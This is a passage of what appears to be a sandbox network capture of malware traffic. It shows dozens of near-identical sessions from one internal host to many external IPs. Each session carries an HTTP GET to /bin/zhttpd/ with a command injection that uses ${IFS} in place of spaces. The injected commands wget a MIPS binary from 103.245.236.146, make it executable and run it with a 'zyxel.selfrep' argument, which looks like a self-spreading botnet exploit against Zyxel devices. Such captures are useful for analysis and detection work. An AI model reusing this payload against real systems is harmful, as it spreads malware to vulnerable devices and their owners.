                                              7152192.168.2.1441440191.20.32.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233429909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7153192.168.2.1447024162.141.241.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233460903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7154192.168.2.1438436138.245.20.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233510971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7155192.168.2.1433642173.15.157.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233529091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7156192.168.2.1443434132.72.157.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233576059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7157192.168.2.1439192129.248.95.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233603001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7158192.168.2.1439778111.128.215.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233659029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7159192.168.2.1433364115.51.210.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233696938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7160192.168.2.1433092141.100.131.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233738899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7161192.168.2.1441546182.86.218.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233757973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7162192.168.2.1450974210.194.240.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233797073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7163192.168.2.1450212161.210.22.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233848095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7164192.168.2.143565445.239.146.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233891964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7165192.168.2.1438720147.47.7.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233927011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7166192.168.2.1459516208.118.255.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233985901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7167192.168.2.143730679.2.3.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234010935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7168192.168.2.143468432.117.62.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234050989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7169192.168.2.144005298.190.242.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234091997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7170192.168.2.14499885.246.78.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234132051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7171192.168.2.144509262.95.68.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234159946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7172192.168.2.144084668.71.25.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234193087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7173192.168.2.1437084182.37.229.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234226942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7174192.168.2.1454854211.248.97.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234277964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7175192.168.2.144810219.52.39.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234298944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7176192.168.2.1451918218.202.102.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234350920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7177192.168.2.1435300103.220.169.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234391928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7178192.168.2.1447162135.135.82.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234407902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7179192.168.2.1432990136.122.37.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234457970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7180192.168.2.1441500161.203.247.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234503984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7181192.168.2.145466036.205.6.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234550953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7182192.168.2.144531858.137.46.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234585047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7183192.168.2.144279461.147.154.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234626055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7184192.168.2.145670864.40.188.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234677076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7185192.168.2.1453528221.41.174.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234694004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7186192.168.2.145588025.78.167.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234745979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7187192.168.2.143690251.19.58.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234781981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7188192.168.2.145597449.12.2.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234824896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7189192.168.2.1443790187.47.109.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234855890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7190192.168.2.1460374108.38.56.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234895945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7191192.168.2.144379648.225.238.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234929085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7192192.168.2.144886889.48.121.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.234986067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7193192.168.2.145942472.169.134.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235013008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7194192.168.2.1453072112.54.188.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235060930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7195192.168.2.1455900147.149.216.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235112906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7196192.168.2.1454150200.150.158.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235158920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7197192.168.2.143418469.147.225.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235173941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7198192.168.2.1433604166.253.4.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235213041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7199192.168.2.144071637.98.4.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235263109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7200192.168.2.143701863.63.80.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235311985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7201192.168.2.1449492198.203.239.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235344887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7202192.168.2.1452280169.46.91.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235377073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7203192.168.2.1445154188.52.74.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235400915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7204192.168.2.1432892145.72.80.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235471964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7205192.168.2.1445844105.7.108.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235506058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7206192.168.2.1456300189.106.133.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235536098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7207192.168.2.1449192157.121.126.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235577106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7208192.168.2.1446600149.111.219.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235598087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7209192.168.2.1436622164.161.205.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235630035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7210192.168.2.1449624117.25.171.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235678911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7211192.168.2.1450330154.18.28.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235707998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7212192.168.2.145722223.250.83.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235761881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7213192.168.2.1458942202.102.246.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235809088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7214192.168.2.1445860217.71.229.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235862970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7215192.168.2.1450406186.67.240.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235896111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7216192.168.2.143466688.207.94.173443
                                              TimestampBytes transferredDirectionData
